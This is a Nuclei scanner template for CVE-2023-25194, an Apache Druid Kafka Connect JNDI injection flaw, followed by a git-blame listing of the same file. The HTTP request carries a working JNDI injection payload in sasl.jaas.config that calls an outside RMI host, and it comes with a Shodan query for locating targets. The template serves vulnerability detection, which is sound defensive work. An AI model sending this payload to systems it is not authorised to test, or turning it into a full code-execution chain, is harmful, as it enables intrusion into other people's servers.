nuclei-templates/http/cves/2023/CVE-2023-25194.yaml

id: CVE-2023-25194

info:
  name: Apache Druid Kafka Connect - Remote Code Execution
  author: j4vaovo
  severity: high
  description: |
    The vulnerability has the potential to enable a remote attacker with authentication to run any code on the system. This is due to unsafe deserialization that occurs during the configuration of the connector through the Kafka Connect REST API
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25194
    - https://nvd.nist.gov/vuln/detail/CVE-2023-25194
    - https://github.com/nbxiglk0/Note/blob/0ddc14ecd296df472726863aa5d1f0f29c8adcc4/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/Java/ApacheDruid/ApacheDruid%20Kafka-rce/ApacheDruid%20Kafka-rce.md#apachedruid-kafka-connect-rce
    - http://packetstormsecurity.com/files/173151/Apache-Druid-JNDI-Injection-Remote-Code-Execution.html
    - https://kafka.apache.org/cve-list
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-25194
    cwe-id: CWE-502
    epss-score: 0.89626
    epss-percentile: 0.98692
    cpe: cpe:2.3:a:apache:kafka_connect:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: kafka_connect
    shodan-query: html:"Apache Druid"
  tags: packetstorm,cve,cve2023,apache,druid,kafka,rce,jndi,oast

http:
  - raw:
      - |
        POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
            "type":"kafka",
            "spec":{
                "type":"kafka",
                "ioConfig":{
                    "type":"kafka",
                    "consumerProperties":{
                        "bootstrap.servers":"127.0.0.1:6666",
                        "sasl.mechanism":"SCRAM-SHA-256",
                        "security.protocol":"SASL_SSL",
                        "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"rmi://{{interactsh-url}}:6666/test\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
                    },
                    "topic":"test",
                    "useEarliestOffset":true,
                    "inputFormat":{
                        "type":"regex",
                        "pattern":"([\\s\\S]*)",
                        "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
                        "columns":[
                            "raw"
                        ]
                    }
                },
                "dataSchema":{
                    "dataSource":"sample",
                    "timestampSpec":{
                        "column":"!!!_no_such_column_!!!",
                        "missingValue":"1970-01-01T00:00:00Z"
                    },
                    "dimensionsSpec":{

                    },
                    "granularitySpec":{
                        "rollup":false
                    }
                },
                "tuningConfig":{
                    "type":"kafka"
                }
            },
            "samplerConfig":{
                "numRows":500,
                "timeoutMs":15000
            }
        }

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - 'RecordSupplier'

      - type: status
        status:
          - 400
# digest: 4a0a00473045022100f788a795856513e1cd0015cba30415da3dd2e1a04d54f3ce0b6fb0f6f63e6ec9022005b2370ad3db8893c2793d0916510d1ddd938746e3cb8ef40eec403e4e3218d5:922c64590222798bb761d5b6d8e72950
metadata added 2023-04-24 05:08:09 +00:00			`id: CVE-2023-25194`
Create apache-druid-kafka-connect-rce.yaml 2023-04-23 20:43:19 +00:00
			`info:`
Update apache-druid-kafka-connect-rce.yaml 2023-04-27 14:53:33 +00:00			`name: Apache Druid Kafka Connect - Remote Code Execution`
Create apache-druid-kafka-connect-rce.yaml 2023-04-23 20:43:19 +00:00			`author: j4vaovo`
			`severity: high`
			`description: \|`
metadata added 2023-04-24 05:08:09 +00:00			`The vulnerability has the potential to enable a remote attacker with authentication to run any code on the system. This is due to unsafe deserialization that occurs during the configuration of the connector through the Kafka Connect REST API`
Create apache-druid-kafka-connect-rce.yaml 2023-04-23 20:43:19 +00:00			`reference:`
			`- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25194`
			`- https://nvd.nist.gov/vuln/detail/CVE-2023-25194`
			`- https://github.com/nbxiglk0/Note/blob/0ddc14ecd296df472726863aa5d1f0f29c8adcc4/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/Java/ApacheDruid/ApacheDruid%20Kafka-rce/ApacheDruid%20Kafka-rce.md#apachedruid-kafka-connect-rce`
vulnerabilities enrichment 2023-07-16 13:32:52 +00:00			`- http://packetstormsecurity.com/files/173151/Apache-Druid-JNDI-Injection-Remote-Code-Execution.html`
			`- https://kafka.apache.org/cve-list`
Create apache-druid-kafka-connect-rce.yaml 2023-04-23 20:43:19 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`
vulnerabilities enrichment 2023-07-16 13:32:52 +00:00			`cvss-score: 8.8`
Create apache-druid-kafka-connect-rce.yaml 2023-04-23 20:43:19 +00:00			`cve-id: CVE-2023-25194`
			`cwe-id: CWE-502`
Revert "TemplateMan Update [Mon Apr 8 11:30:07 UTC 2024] :robot:" This reverts commit 433dda4ae5b824564b44075bb95a96ecdbe263a6. 2024-04-08 11:34:33 +00:00			`epss-score: 0.89626`
			`epss-percentile: 0.98692`
templateman update 2023-10-14 11:27:55 +00:00			`cpe: cpe:2.3:a:apache:kafka_connect::::::::`
metadata added 2023-04-24 05:08:09 +00:00			`metadata:`
boolean format update 2023-06-04 08:13:42 +00:00			`verified: true`
templateman update 2023-10-14 11:27:55 +00:00			`max-request: 1`
vulnerabilities enrichment 2023-07-16 13:32:52 +00:00			`vendor: apache`
templateman update 2023-10-14 11:27:55 +00:00			`product: kafka_connect`
			`shodan-query: html:"Apache Druid"`
			`tags: packetstorm,cve,cve2023,apache,druid,kafka,rce,jndi,oast`
Create apache-druid-kafka-connect-rce.yaml 2023-04-23 20:43:19 +00:00
misc syntax fixes (#7201) 2023-05-09 12:43:13 +00:00			`http:`
Create apache-druid-kafka-connect-rce.yaml 2023-04-23 20:43:19 +00:00			`- raw:`
			`- \|`
			`POST /druid/indexer/v1/sampler?for=connect HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/json`

			`{`
			`"type":"kafka",`
			`"spec":{`
			`"type":"kafka",`
			`"ioConfig":{`
			`"type":"kafka",`
			`"consumerProperties":{`
			`"bootstrap.servers":"127.0.0.1:6666",`
			`"sasl.mechanism":"SCRAM-SHA-256",`
			`"security.protocol":"SASL_SSL",`
			`"sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"rmi://{{interactsh-url}}:6666/test\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"`
			`},`
			`"topic":"test",`
			`"useEarliestOffset":true,`
			`"inputFormat":{`
			`"type":"regex",`
			`"pattern":"([\\s\\S]*)",`
			`"listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",`
			`"columns":[`
			`"raw"`
			`]`
			`}`
			`},`
			`"dataSchema":{`
			`"dataSource":"sample",`
			`"timestampSpec":{`
			`"column":"!!!_no_such_column_!!!",`
			`"missingValue":"1970-01-01T00:00:00Z"`
			`},`
			`"dimensionsSpec":{`

			`},`
			`"granularitySpec":{`
			`"rollup":false`
			`}`
			`},`
			`"tuningConfig":{`
			`"type":"kafka"`
			`}`
			`},`
			`"samplerConfig":{`
			`"numRows":500,`
			`"timeoutMs":15000`
			`}`
			`}`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: interactsh_protocol`
			`words:`
			`- "dns"`

			`- type: word`
			`part: body`
			`words:`
			`- 'RecordSupplier'`

			`- type: status`
			`status:`
Auto Template Signing [Tue Mar 26 08:19:10 UTC 2024] :robot: 2024-03-26 08:19:10 +00:00			`- 400`
			`# digest: 4a0a00473045022100f788a795856513e1cd0015cba30415da3dd2e1a04d54f3ce0b6fb0f6f63e6ec9022005b2370ad3db8893c2793d0916510d1ddd938746e3cb8ef40eec403e4e3218d5:922c64590222798bb761d5b6d8e72950`